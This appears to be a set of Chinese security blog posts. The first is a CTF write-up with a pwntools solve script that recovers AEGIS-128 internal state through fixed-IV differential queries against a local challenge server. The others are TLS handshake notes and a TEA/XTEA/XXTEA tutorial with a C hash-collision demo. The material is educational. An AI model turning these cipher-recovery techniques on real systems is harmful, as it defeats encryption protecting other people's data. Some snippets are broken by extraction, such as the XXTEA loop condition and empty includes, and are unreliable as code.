我们来仔细看一下Aegis中的AES算法。首先来看到官方给出的aes:

def aes_enc(s: block, round_key: block) -> block:
  """Performs the AESENC operation with tables."""
  t0 = (te0[s[0]] ^ te1[s[5]] ^ te2[s[10]] ^ te3[s[15]])
  t1 = (te0[s[4]] ^ te1[s[9]] ^ te2[s[14]] ^ te3[s[3]])
  t2 = (te0[s[8]] ^ te1[s[13]] ^ te2[s[2]] ^ te3[s[7]])
  t3 = (te0[s[12]] ^ te1[s[1]] ^ te2[s[6]] ^ te3[s[11]])
  s = _block_from_ints([t0, t1, t2, t3])
  return _xor(s, round_key)

te0[s[0]],te1[s[1]]这些就相当于是s盒，按照s0,s5,s10,s15这种顺序取值相当于是行位移(shift)，取值进行异或就相当于是列混淆(mix_column)。整个过程我们大致写下来就是:

1	AES(m) = mix_column(shift(Sbox(m)))

实际上就是AES加密算法中，除去密钥交换这一步之后的剩余步骤。并且我们知道，整个Aegis加密中，AES参与的方式为:

if j != 0
S[i+1][j] = AES(S[i][(j+4)%5])
else
S[i+1][j] = AES(S[i][(j+4)%5]) ^ mi

于是我们可以简写成如下的运算:

if j != 0
C = AES(M)
else
C = AES(M)^m

那假设此时，我们的M发生了一些变化，我们这里将变化的差值写作dM，此时有

M1 = M^dM

对M1的加密就可以写成:

if j != 0
C1 = AES(M1) = AES(M^dM)
else
C1 = AES(M1)^m = AES(M^dM)^m

C1、C均为我们可以得到的具体值，如果我们能够通过控制加密的内容，使得dM可控（之后会展示）我们就有机会能够推导出M的值。具体的做法如下:

1. 将C1^C，此时消除了m的影响，存在公式
C1^C = AES(M^dM)^AES(M)
2. AES = mix_column(shift(Sbox(m)))
然而首先我们知道，mix_column本身也是异或运算得到的结果，也就是说满足
mix_column(x)^mix_column(x^dx) = mix_column(dx)
而shift只是位移操作，所以也可满足
shift(x)^shift(x^dx) = shift(dx)
所以实际上可以写作
C1^C = AES(M^dM)^AES(M) = Sbox(M^dM)^Sbox(M)

然而实际上，Sbox运算是可以被爆破的。假设我们能知道dM，那我们只需要爆破16个字节，最终就能推导出M的值

Aegis的加密过程

由于Aegis128加密中的最小单位为128bit，也就是16字节，所以加密之前会将当前的明文填充至16的倍数。之后，每16个字节的加密手法如下:

1
2
3

for i in range(0, len16(msg), 16):
    Ci = (S2 & S3) ^ S1 ^ S4 ^ mi
    Si+1 = StatusUpdate(Si, mi)

注意一个细节，这边为了防止S0的参与导致加密算法被利用，所以在加密过程中故意抛弃了S0。
加密结束之后，更新当前状态块。这里参考一个图可能会更加清晰:

p[i][0]为我们按照16字节分组的第i组明文输入，k[0][0]表示第0组的明文加密得到的密文。这里注意，我们的明文的第0组实际上参与了第一组密文的生成，并且还影响了第1组的状态。图上的红框表示的就是，当我们的输入p[0][0]发生变化的时候，实际上会影响的状态。从图上可知，当输入p[0][0]变化的时候，实际上会影响的是:s[1][0], s[2][0], s[2][1], k[2][0]（这个地方应该写作k[2]，可能是图片作者写错了）

参考源码：


def raw_encrypt(S, msg):
    ct_blocks = []
    for i in range(0, len(msg), 16):
      blk = msg[i:i+16]
      mask = Aegis128.output_mask(S)
      if len(blk) < 16:
        mask = mask[:len(blk)]
        p = blk + bytes(16 - len(blk))
      else:
        p = blk
      ct_blocks.append(_xor(mask, blk))
      S = Aegis128.state_update(S, p)
    return S, b''.join(ct_blocks)

def encrypt(self, iv, ad, msg):
    S = self.initialize(iv)
    S = self.update_aad(S, ad)
    S, ct = self.raw_encrypt(S, msg)
    tag = self.finalize(S, len(ad) * 8, len(msg) * 8)
    return ct, tag

Ageis的漏洞点

加密流程中，IV和key都不会更新，并且加密7次。最终目的是让我们求出当使用了空的aad进行了StateUpdate状态后得到的初始状态，也就是状态S[1]。
这一类IV、key不发生变化的题目，其实传达的一个含义就是加密算法本身是不变的，即是说对于加密算法C = F(m)，这个F是不变量，而此时的m和C都是已知的，就有机会构造合适的m，从而泄露F中的一些信息

第一步泄露

这里重新展示一下之前用来描述加密的那张图，这里我们着重关注的是变化值:

可以看到，当p[0][0]变化的时候，s[1][0], s[2][0], s[2][1], k[2]均会收到影响。这里我们复习一下这几个值的关系:


（1）k[2] = (S[2][2] & S[2][3]) ^ S[2][1] ^ S[2][4] ^ p[2][0]
（2）k[1] = (S[1][2] & S[1][3]) ^ S[1][1] ^ S[1][4] ^ p[1][0]
（3）S[2][0] = AESRound(S[1][4])^S[1][0]^p[1][0]
（4）S[1][0] = AESRound(S[0][4])^S[0][0]^p[0][0]

由于（2）我们可以知道，S[1][0]并不参与到整个加密过程中，所以不会对加密本身有影响，因此k[1]的值不发生变化
此时生成的密文kd[2]虽然发生了变化，但是其变化仅仅是因为S[2][1]发生了变化，因为在StateUpdate中，只有S[2][1]会受到输入的影响，其他的状态并不收到当前的输入状态影响:

这里我们将变化后的p写作dp，并且满足dtp = dp^p，发生了相应变化的变量都加上d的前缀，于是此时有：

1	kd[2] ^ k[2] = S[2][1] ^ Sd[2][1] = AESRound(S[1][0])^AESRound(Sd[1][0])

此时我们的kd[2] ^ k[2]是已知量。而我们此时知道

1 2	（5）AESRound(S[1][0])^AESRound(Sd[1][0]) = Sbox(S[1][0])^Sbox(Sd[1][0]) （6）S[1][0] = AES(S[0][4]) ^ S[0][0] ^ p[0][0]

由于（6）中，S[0][0], S[0][4]在IV和key不变的情况下，即使我们更改p也不会发生变化，所以实际上可以推出

1 2	（7）Sd[1][0]^S[1][0] = p[0][0]^dp[0][0] = dtp[0][0] ====> Sd[1][0] = S[1][0] ^ dtp[0][0]

于是我们可以将（5）推到成

1	（8）Sbox(S[1][0])^Sbox(Sd[1][0]) = Sbox(S[1][0])^Sbox(S[1][0]^dpt[0][0]) = kd[2]^k[2]

在（8）这个算式中，dpt，kd，k三个值我们都知道，于是我们只需要爆破S[1][0]中的16字节即可。
不过经过测试，直接爆破是存在多解的情况，所以我们可以增加一个变化，也就是dpt2，两次的结果综合考虑。经过测试，这种方式能够得到唯一的S[1][0]

def resolve(dk_1, ds_1, dk_2, ds_2):
    # here we check the 
    tmpk = aes.bytes2matrix(dk_1)
    aes.inv_mix_columns(tmpk)
    aes.inv_shift_rows(tmpk)
    d_k1 = aes.matrix2bytes(tmpk)

    tmpk = aes.bytes2matrix(dk_2)
    aes.inv_mix_columns(tmpk)
    aes.inv_shift_rows(tmpk)
    d_k2 = aes.matrix2bytes(tmpk)
    # result should be unique
    res = bytearray(16)
    # try to bruce it
    for i in range(16):
        x1 = set()
        for c in range(256):
            if aes.s_box[c] ^ aes.s_box[c^ds_1[i]] == d_k1[i] and aes.s_box[c] ^ aes.s_box[c^ds_2[i]] == d_k2[i]:
                x1.add(c)
        res[i] = x1.pop()
    assert(len(res) == 16)
    return bytes(res)

进一步泄露

由于我们有7次通信机会，目前可以如下安排

第一次：我们一口气通信获得k[0],k[1],k[2],k[3],k[4]，此时我们可以将p设置为全0，这样的话能够帮助我们之后更加方便的进行计算
第二、三次：得到S[1][0]
第四、五次：得到S[2][0]
第六、七次：得到S[3][0]

我们可以如法炮制，通过修改p[1][0],p[2][0]，得到S[2][0],S[3][0]。此时我们有公式:

1
2
3

（3）S[2][0] = AESRound(S[1][4])^S[1][0]^p[1][0] ==> 直接逆运算，可得S[1][4]
（9）S[3][0] = AESRound(S[2][4])^S[2][0]^p[2][0] ==> 利用之前的技巧，可得S[2][4]
（10）S[2][4] = AESRound(S[1][3])^S[1][4] ==> 直接逆运算，可得S[1][3]

此时我们就有了S[1][0], S[1][3], S[1][4]，并且题目中泄露了S[1][2]，所以我们最终利用

1	（11）C[1] = (S[2][0] & S[3][0]) ^ S[1][0] ^ S[4][0] ^ pt[0]

就能得到最后的S[1][1]，此时整个题泄露完成。

import aes
import os
import aegis
from aegis import _xor,_and
from pwn import *
import base64



def R(x):
    tmp = aes.bytes2matrix(x)
    aes.sub_bytes(tmp)
    aes.shift_rows(tmp)
    aes.mix_columns(tmp)
    return aes.matrix2bytes(tmp)


def invR(x3):
    tmp = aes.bytes2matrix(x3)
    aes.inv_mix_columns(tmp)
    aes.inv_shift_rows(tmp)
    aes.inv_sub_bytes(tmp)
    return aes.matrix2bytes(tmp)

def resolve(dk_1, ds_1, dk_2, ds_2):
    # here we check the 
    tmpk = aes.bytes2matrix(dk_1)
    aes.inv_mix_columns(tmpk)
    aes.inv_shift_rows(tmpk)
    d_k1 = aes.matrix2bytes(tmpk)

    tmpk = aes.bytes2matrix(dk_2)
    aes.inv_mix_columns(tmpk)
    aes.inv_shift_rows(tmpk)
    d_k2 = aes.matrix2bytes(tmpk)
    # result should be unique
    res = bytearray(16)
    # try to bruce it
    for i in range(16):
        x1 = set()
        for c in range(256):
            if aes.s_box[c] ^ aes.s_box[c^ds_1[i]] == d_k1[i] and aes.s_box[c] ^ aes.s_box[c^ds_2[i]] == d_k2[i]:
                x1.add(c)
        res[i] = x1.pop()
    assert(len(res) == 16)
    return bytes(res)

def encrypt(ph, aad, pt):
    ph.sendline(base64.standard_b64encode(pt))
    ph.sendline(base64.standard_b64encode(aad))
    ct = ph.recvline(keepends=False)
    ct = base64.standard_b64decode(ct.decode('utf-8'))
    tag = ph.recvline(keepends=False)
    tag = base64.standard_b64decode(tag.decode('utf-8'))
    return ct, tag


def decrypt(ph, aad, pt, index, ct):
    left_index = (index+1)*16
    right_index = (index+2)*16
    enc, tag = encrypt(ph, aad, pt[2*index-1])
    # print("enc[{}:{}]".format(left_index/32,right_index/32))
    # print("pt[{}:{}]".format(2*index-1, 2*index))
    ct1_2 = enc[left_index:right_index]
    # encrypt 3
    enc, tag = encrypt(ph, aad, pt[2*index])
    # print(pt[2*index])
    ct1_3 = enc[left_index:right_index]
    # decrypt s10
    # print(ct)
    # print(ct1_2)
    # print(ct)
    # print(ct1_2)
    dk1 = _xor(ct,ct1_2)
    dk2 = _xor(ct,ct1_3)
    # split S1/S5
    # pt split ,too
    s = resolve(dk1, pt[2*index-1][16*(index-1):16*(index)], 
                dk2, pt[2*index][16*(index-1):16*(index)])
    return s

def localTest():
    ph = remote("127.0.0.1",'10090')
    pt = []
    padding = b'\x00'*16
    p0 = b'\x00'*16
    p1 = b'\x00'*16
    p2 = b'\x00'*16
    pt.append(p0+p1+p2+padding*2)
    # for i in range(1,7):
    # pt.append(bytes([i%2+1]*16)+padding)
    # for s10
    pt.append(bytes([1]*16)+padding+padding)
    pt.append(bytes([2]*16)+padding+padding)
    # for s20
    pt.append(padding+bytes([1]*16)+padding+padding)
    pt.append(padding+bytes([2]*16)+padding+padding)
    # for s30
    pt.append(padding+padding+bytes([1]*16)+padding*2)
    pt.append(padding+padding+bytes([2]*16)+padding*2)
    iv = ph.recvline(keepends=False)
    aad = b''

    # encrypt 1
    enc, tag = encrypt(ph, aad, pt[0])
    print(enc)
    ct = []
    for i in range(5):
        ct.append(enc[i*16:(i+1)*16])
    
    s10 = decrypt(ph, aad, pt, 1, ct[2])
    # decrypt 2 
    s20 = decrypt(ph, aad, pt, 2, ct[3])
    # decrypt 3
    s30 = decrypt(ph, aad, pt, 3, ct[4])
    # s20 = s10 xor R(s14) ==> s14 = invR(s20 xor s10)
    s14 = invR(_xor(s20, s10))
    # s30 = s20 xor R(s24) ==> s24 = invR(s20 xor s30)
    # s24 = s14 xor R(s13) ==> s13 = invR(s14 xor s24)
    s24 = invR(_xor(s20, s30))
    s13 = invR(_xor(s24, s14))
    ph.recvuntil("Oops, something leak:")
    s12 = ph.recvline(keepends=False)
    print(s12)
    s12 = base64.standard_b64decode(s12.decode('utf-8'))
    # if pt = 00 then enc1 = (s12&s13) xor s14 xor s11
    # -> s11 = enc1 xor s14 xor (s12&s13)
    enc1 = enc[16:16*2]
    s11 = _xor(s14, _xor(enc1, _and(s12, s13)))
    # s15 = _xor(s12, _xor(enc12, _and(s16, s17)))
    s1 = s10+s11+s12+s13+s14
    ph.sendline(base64.standard_b64encode(s1))
    ph.interactive()
    
if __name__ == "__main__":
    localTest()

总结

总的来说，这次出题经历逼迫自己成功学习了密码学的技巧，感觉还是有收获的。最后也是自己逼着自己总结了一份官方wp，估计等官方博客的travis修好了就能部署好了吧（？）。回顾今年，似乎做了不少密码学的题目，甚至还分析了一个相关的CVE，感觉慢慢也是点开了一个新的技能树呢。

TLS/SSL 握手协议学习

2020-11-26T14:58:24.000Z

最近必须要了解一下https通信过程中，tls握手到底是怎么样的，这里记录一下学习过程

TLS/SSL握手

简介

自从进入了https时代，网络通信终于也不用再裸奔了。实现这一切的就是TLS协议，TLS(Transport Layer Security)以及老版本SSL(Secure Sockets Layer)，是一个应用层的协议，这个协议会帮助通信的双方进行一次密钥协商，并且对之后的通信内容进行加密。这个协议广泛的应用于各种应用上，包括web浏览器，邮件，各类即时通讯等。TLS保护的是服务器与客户端通信过程中的流量。

协议过程

TLS协议的主要目标是在两个通信应用程序之间提供隐私和数据完整性。该协议由两层组成：TLS记录协议 Record Protocol和TLS握手协议 Handshake Protocol。 TLS记录协议位于最底层，位于某些可靠的传输协议（例如TCP ）之上。 TLS记录协议提供了具有两个基本属性的连接安全性：

连接是私有的（private）。对称加密用于数据加密（例如AES，RC4等）。此对称加密的密钥是为每个连接唯一生成的，并且基于由另一个协议（例如TLS握手协议）协商的机密。记录协议也可以不加密使用。
链接是可依靠的（reliable）。消息传输包括使用密钥MAC的消息完整性检查。例如SHA1之类的哈希函数用于MAC的计算。记录协议可以在没有MAC的情况下运行，但是通常仅在该模式下使用，而另一协议使用记录协议作为协商安全参数的传输方式。

TLS记录协议用于封装各种更高级别的协议。 TLS握手协议就是这样一种这样的封装协议，允许服务器和客户端进行身份验证，并在应用协议发送或接收其第一字节数据之前协商加密算法和加密密钥。 TLS握手协议提供具有三个基本属性的连接安全性：

可以使用非对称身份验证对等方的身份，或者使用公钥算法来验证。验证过程实际上是可u俺的，但是一般情况下至少有一方会被要求验证（一般是验证服务器）
共享密钥的协商是安全的：协商者通常无法获得协商的密钥（某些情况下除外），并且在加密的各条链接上都是无法获取的。甚至于说攻击者如果将自己放入协商后的连接中，依然也不可获取密钥
协商是可依靠的：没有一个攻击者可以不被感知的修改协商的内容

TLS的一个优点是它与应用程序协议无关。高层协议可以透明地在TLS协议之上分层。但是，TLS标准未指定协议如何通过TLS添加安全性；有关如何启动TLS握手以及如何解释交换的认证证书的决定，由运行在TLS之上的协议的设计者和实现者来决定。

TLS目标

TLS协议的目标按优先级顺序如下：

1.加密安全性：应该使用TLS在两方之间建立安全连接。
2.互操作性：独立的程序员应该能够使用TLS开发应用程序，这些应用程序可以成功交换密码参数而无需了解彼此的代码。
3.可扩展性：TLS寻求提供一个框架，可以在必要时将新的公共密钥和批量加密方法并入其中。这还将实现两个子目标：避免创建新协议的需要（并冒引入可能的新弱点的风险），以及避免实现整个新的安全性库的需要。
4.相对效率：加密操作通常会占用大量CPU资源，尤其是公钥操作。因此，TLS协议已合并了可选的会话缓存方案，以减少需要从头开始建立的连接数。此外，已采取措施减少网络活动。

一些细节

在流数据中，大部分的数据都是大端的
可选的数据用[[]]双中括号括起来
如果有未解释的单字节对象，定义为不透明类型(opaque)

在这篇文档中，我们将一些具有类似含义的数据流定义为向量（也就是通常意义上的数组）。这些向量的大小通常以如下的形式声明:

T T'[n]

这里我们定义了一个T类型的向量T’，T’总共占了n个字节

在之后的文章中我们协定，当定义数据的时候，那个数组的大小定义的实际上是bytes的数量，而非元素的个数，这点和通常的C语言定义不同，例如：


opaque Datum[3];      /* three uninterpreted bytes */
Datum Data[9];        /* 3 consecutive 3 byte vectors */

如上，Datum占用了三个字节，并且这里协议并未解释其作用，这边的Data总共占用了9个字节，实际上是三个Datum数据。

可变长度向量是通过指定有效长度的子范围（包括端值）来定义的，包括符号。对它们进行编码时，实际长度在字节流中位于矢量内容之前。该长度将采用数字形式，该数字消耗保持矢量指定的最大（上限）长度所需的字节数。实际长度字段为零的可变长度向量称为空向量。

T T';

在下面的示例中，mandatory是一个向量，必须包含300到400个不透明类型的字节。它永远不能为空。实际长度字段消耗两个字节uint16，这足以表示值400（请参见第4.4节）。另一方面，更长的时间可以表示最多800个字节的数据或400个uint16元素，并且它可能为空。它的编码将包括在向量之前的两字节实际长度字段。编码向量的长度必须是单个元素长度的偶数倍（例如，uint16的17字节向量是非法的）。


opaque mandatory<300..400>;
      /* length field is 2 bytes, cannot be empty */
uint16 longer<0..800>;
      /* zero to 400 16-bit unsigned integers */

TEA-Family

2020-11-15T02:09:25.000Z

作为一个老年CTF选手，真实见证了逆向出题的变化，从当年的字节异或已经变成了TEA这种高阶算法。。这里就来学习一下

本文首发于安全客 https://www.anquanke.com/post/id/224198

TEA系列算法学习

算法介绍

TEA（Tiny Encryption Algorithm）微型加密算法是一种易于描述的基于块的加密手法。通常来说，TEA加密算法会作用在两个32bit的无符号整数上，并且会使用一个128bit的数字作为密钥。其拥有一个叫做Feistel 结构的密码学结构。这种密码学结构通俗的来讲就是会将加密的plaintext分成L、R两部分，并且满足

L_{i+1} = R_i, R_{i+1} = F(K_i,R_i) \oplus L_i

这种交换式的加密方式的一种结构。

TEA加密算法使用了64轮的加密算法结构，并且是成对的执行加密轮次。在加密周期中，每个密钥都是按照相同的轮次进行密钥的混合，从而完成加密。这个加密算法中为了防止基于轮询过程中的可能发生的攻击，使用了黄金分割律数字转换的一个数字 2654435769 （0x9E3779B9）作为魔数。

值得注意的是，TEA算法中的密钥中存在缺陷。每一个key都等效于其他算法中的三个key，这意味着实际上key中只有126bit会生效。因此，TEA算法的散列性能不好。这个弱点甚至导致了Xbox被黑客攻击。并且TEA容易受到密钥相关攻击，这需要在相关密钥对下选择 $2^{23}$ 个明文，并且具有 $2^{32}$ 的时间复杂度 ———— 摘自wiki，没太看懂

TEA算法实现

算法加密过程可以用一个图简单的说明:

输入一定要是一个64bit的数字，或者可以写作一个拥有两个元素的32bit的数组。，并且需要一个两倍长度的key（int[4])。整个加密流程如下:


void encrypt (uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0=v[0], v1=v[1], sum=0, i;           /* set up */
    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
        sum += delta;
        v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
    }                                              /* end cycle */
    v[0]=v0; v[1]=v1;
}

有几个重要的特征

存在一个delta值，这个值会不停的增加到sum之中，形成一种循环的效果
传入的v0，v1会和传入的key0，key1运算。v1优先参与，并且会有一个位移->与密钥相加->异或的过程。
v0 = 原先的v1值套用公式，v1 = 变化后的v0 套用公式
之前用于计算delta的sum状态值也会参与

由于是一个类似delta状态变化+异或加密的过程，所以整个流程反过来写即可得到解密

void decrypt (uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up; sum is 32*delta */
    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }                                              /* end cycle */
    v[0]=v0; v[1]=v1;
}

整个加密算法同样也适用于ECB,CBC等加密模式。

The TEA Hash
After reading Bruce Schneier's book on crypto, we learned that TEA was a really bad choice as a hash. The book says that TEA must never be used as a hash, because it is insecure if used this way. If you flip both bit 16 and 31 of a 32 bit word, the hash will be the same. We could easily patch a jump in the second bootloader so that it would not be recognized. This modified jump lead us directly into flash memory.

But why did they make this mistake? Obviously the designers knew nothing about crypto - again! - and just added code without understanding it and without even reading the most basic books on the topic. A possible explanation why they chose TEA would be that they might have searched the internet for a "tiny" encryption algorithm - and got TEA.

Davies–Meyer

在密码学中，单向压缩函数(one-way compression function)是将两个固定长度的输入转换为固定长度的输出的功能。该转换是“单向”的，这意味着在给定输出的情况下，很难反向计算压缩前的输入。单向压缩函数与普通的数据压缩算法无关，而可以将其准确地（无损压缩）或近似（有损压缩）转换为原始数据。
单向要锁函数通常是由块加密算法变形而来的，一种常见的就是Davies–Meyer算法。该算法将消息的每个块（mi）作为加密算法的密钥。它将上一次加密生成的哈希值（Hi-1）作为要加密的明文输入。之后，将输出密文与上一个哈希值（Hi-1）进行异或（⊕），以产生下一个哈希值（Hi）。在第一轮中，如果没有以前的哈希值，它将使用一个恒定的预先指定的初始值（H0），算法可以写成

H_i = E_{m_i}(H_{i-1}) \oplus H_{i-1}

其中的 $E_{m_i}$ 可以理解成使用mi块作为密钥的加密算法

TEA算法的弱点

TEA整个算法和密钥密切相关，这种算法我们称为密钥相关算法。这类算法如果密钥在加密过程中处理不当，很容易就会引发密钥相关攻击，感兴趣的可以看这边原理可以看这边，概括的说就是，TEA算法中的每一个密钥都会有其他三种相同的密钥。大致可用如下方式理解：

1	v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);

v1那一段也同理。
上述的逻辑，我们可以简写成:

V_0 = (C_1 + k_0) \oplus C_2 \oplus (C_2 + k_1)

其中 $C_*$ 为常量。设此时我们让k0和k1的变化为 $\Delta k_*$ ，变化后的我们写作 $k'_*$ ，此时有公式:

V'_0 = (C_1 + k'_0) \oplus C_2 \oplus (C_2 + k'_1)

如上，如果我们想要保证 $V'_0 == V_0$ ，一个最好的办法就是让这个异或过程发生的变化被抵消掉。根据原理我们可以知道，如果将k0和k1的最高bit同时进行翻转，那么这个变化将会有1/2的概率被抵消

如果TEA算法被当作基于Davies–Meyer的hash算法的话，就很容易因为散列度不足导致碰撞发生。

在这边提到了关于TEA算法错误使用的例子。这里提到了Xbox和Reiserfs都错误的使用了TEA算法，虽然xbox的源码我们找不到了，但是我找到了Reiserfs中使用TEA的源代码，其中关键的如下:


#define DELTA 0x9E3779B9
#define FULLROUNDS 10/* 32 is overkill, 16 is strong crypto */
#define PARTROUNDS 6/* 6 gets complete mixing */
/* a, b, c, d - data; h0, h1 - accumulated hash */
#define TEACORE(rounds)\
do {\
u32 sum = 0;\
int n = rounds;\
u32 b0, b1;\
\
b0 = h0;\
b1 = h1;\
\
do\
{\
sum += DELTA;\
b0 += ((b1 << 4)+a) ^ (b1+sum) ^ ((b1 >> 5)+b);\
b1 += ((b0 << 4)+c) ^ (b0+sum) ^ ((b0 >> 5)+d);\
} while(--n);\
\
h0 += b0;\
h1 += b1;\
} while(0)
u32 keyed_hash(const signed char *msg, int len)
{
u32 k[] = { 0x9464a485, 0x542e1a94, 0x3e846bff, 0xb75bcfc3 };
u32 h0 = k[0], h1 = k[1];
u32 a, b, c, d;
u32 pad;
int i;
/*      assert(len >= 0 && len < 256); */
pad = (u32) len | ((u32) len << 8);
pad |= pad << 16;
while (len >= 16) {
a = (u32) msg[0] |
    (u32) msg[1] << 8 | (u32) msg[2] << 16 | (u32) msg[3] << 24;
b = (u32) msg[4] |
    (u32) msg[5] << 8 | (u32) msg[6] << 16 | (u32) msg[7] << 24;
c = (u32) msg[8] |
    (u32) msg[9] << 8 |
    (u32) msg[10] << 16 | (u32) msg[11] << 24;
d = (u32) msg[12] |
    (u32) msg[13] << 8 |
    (u32) msg[14] << 16 | (u32) msg[15] << 24;
TEACORE(PARTROUNDS);
len -= 16;
msg += 16;
}
if (len >= 12) {
a = (u32) msg[0] |
    (u32) msg[1] << 8 | (u32) msg[2] << 16 | (u32) msg[3] << 24;
b = (u32) msg[4] |
    (u32) msg[5] << 8 | (u32) msg[6] << 16 | (u32) msg[7] << 24;
c = (u32) msg[8] |
    (u32) msg[9] << 8 |
    (u32) msg[10] << 16 | (u32) msg[11] << 24;
d = pad;
for (i = 12; i < len; i++) {
d <<= 8;
d |= msg[i];
}
} else if (len >= 8) {
a = (u32) msg[0] |
    (u32) msg[1] << 8 | (u32) msg[2] << 16 | (u32) msg[3] << 24;
b = (u32) msg[4] |
    (u32) msg[5] << 8 | (u32) msg[6] << 16 | (u32) msg[7] << 24;
c = d = pad;
for (i = 8; i < len; i++) {
c <<= 8;
c |= msg[i];
}
} else if (len >= 4) {
a = (u32) msg[0] |
    (u32) msg[1] << 8 | (u32) msg[2] << 16 | (u32) msg[3] << 24;
b = c = d = pad;
for (i = 4; i < len; i++) {
b <<= 8;
b |= msg[i];
}
} else {
a = b = c = d = pad;
for (i = 0; i < len; i++) {
a <<= 8;
a |= msg[i];
}
}
TEACORE(FULLROUNDS);
/*return 0;*/
return h0 ^ h1;
}

可以看到，这里将输入作为了加密算法的密钥。我们可以按照前文提到的攻击手段，给出如下的例子:

int main()
{
    u_int32_t key[] = {1,2,3,4};
    key[1] |= (1<<31);
    printf("key0 = 0x%x\n",key[0]);
    printf("key1 = 0x%x\n",key[1]);
    printf("[1] wrong hash function get ans:%x\n", keyed_hash(key, 16));
    key[0] |= (1<<31);
    key[1] &= ((1<<31)-1);
    printf("key0 = 0x%x\n",key[0]);
    printf("key1 = 0x%x\n",key[1]);
    printf("[2] wrong hash function get ans:%x\n", keyed_hash(key, 16));
    return 0;
}

此时会发现，两个key会得出同样的hash值。Xbox当年就是因为错误的使用TEA作为hash函数，从而导致原先从ROM加载的bootloader地址被修改成从RAM加载，从而绕过了相关安全固件的检查，感兴趣的可以看这里（如果将来有空，可以帮忙翻译一下这类文章，感觉非常有的有趣）

XTEA

为了解决TEA算法中的密钥相关攻击，TEA的设计者提出了XTEA（eXtended TEA）算法来解决之前的密钥相关攻击问题。

#include 

/* take 64 bits of data in v[0] and v[1] and 128 bits of key[0] - key[3] */

void encipher(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {
    unsigned int i;
    uint32_t v0=v[0], v1=v[1], sum=0, delta=0x9E3779B9;
    for (i=0; i < num_rounds; i++) {
        v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
        sum += delta;
        v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum>>11) & 3]);
    }
    v[0]=v0; v[1]=v1;
}

void decipher(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {
    unsigned int i;
    uint32_t v0=v[0], v1=v[1], delta=0x9E3779B9, sum=delta*num_rounds;
    for (i=0; i < num_rounds; i++) {
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum>>11) & 3]);
        sum -= delta;
        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
    }
    v[0]=v0; v[1]=v1;
}

可以看到相较之前，发生了如下的变化:

由之前的((v1<<4) + k0) ^ ((v1>>5) + k1) 变化成了 ((v1 << 4) ^ (v1 >> 5)) + v1)，此时v1内部数据的加密变化不再受到密钥的影响。
原先的v1 + sum变成了(sum + key[sum & 3])以及sum + key[(sum>>11) & 3]，密钥变成了轮转使用，而不是固定只针对某种数据进行加密（解密）。并且此时密钥的选取受到sum的影响
sum += delta的时机由每次加密开头就发生变化到v0，v1两个block加密的中间。

这些变化帮助XTEA摆脱了一些密钥相关攻击，不过同时诞生了一种叫做TEA 块加密的加密手法。这种手法作用在一些可变长的数据中（XTEA默认用于64bit长的数据）。这中加密使用XTEA的轮转加密函数（就是上述的加密流程），但是却将同一段消息进行多次迭代加密。因为它对整个消息进行操作，所以块加密具有不需要ECB、CBC那些分组密码加密的属性。然而这个方式给XTEA本身引入了漏洞，如下

void teab1_encrypt(long *v, long n, long *k)
{
    unsigned long z = v[n - 1], sum = 0, e;
    long p, q;
    for (q = 6 + 52 / n; q > 0; q--)
    {
        sum += 0x9e3779b9;
        e = sum >> 2 & 3 ;
        for (p = 0; p < n; p++)
            z = v[p] += (((z << 4) ^ (z >> 5)) + z) ^
            (k[(p & 3) ^ e] + sum);
    }
}

这类加密算法本身虽然套用了XTEA，不过总的来说也是属于一种错误使用，所以给了暴力破解的可能。感兴趣的可以参考这里

XXTEA

在经历了块加密的问题之后，XTEA再度进化，变成了支持块加密XXTEA。

这次的加密代码如下:

#include 
 #define DELTA 0x9e3779b9
 #define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))
 
 void btea(uint32_t *v, int n, uint32_t const key[4]) {
   uint32_t y, z, sum;
   unsigned p, rounds, e;
   if (n > 1) {          /* Coding Part */
     rounds = 6 + 52/n;
     sum = 0;
     z = v[n-1];
     do {
       sum += DELTA;
       e = (sum >> 2) & 3;
       for (p=0; p-1; p++) {
         y = v[p+1]; 
         z = v[p] += MX;
       }
       y = v[0];
       z = v[n-1] += MX;
     } while (--rounds);
   } else if (n < -1) {  /* Decoding Part */
     n = -n;
     rounds = 6 + 52/n;
     sum = rounds*DELTA;
     y = v[0];
     do {
       e = (sum >> 2) & 3;
       for (p=n-1; p>0; p--) {
         z = v[p-1];
         y = v[p] -= MX;
       }
       z = v[n-1];
       y = v[0] -= MX;
       sum -= DELTA;
     } while (--rounds);
   }
 }

可以看到是由之前提到过的块加密衍生的一种写法。并且作者给出了这种算法的优势：

每一个bit的更改将影响整个块的大约一半的bit位，但。
不用进行加密模式的选择。
即使采用始终更改发送的数据（可能只是一个消息号）的正确用法，只有相同的消息会给出相同的结果，并且只有很少量的信息泄漏。
应始终检查消息号，因为此操作是针对接受随机消息的检查。
应该无法被剪切和合并攻击。
如果不能接受很长的消息，则可以将它们分成60个单词的小块，并类似于用于DES的方法进行链接。

不过即使这样，这个算法似乎还是存在选择明文攻击的可能。感兴趣的可以自行搜索。

CTF题目中的常见TEA

这类算法比较常见于逆向中，在分析二进制文件中的算法的时候有几个识别的特征:

可能存在针对64bit以及128bit数字的操作（输入的msg和key）
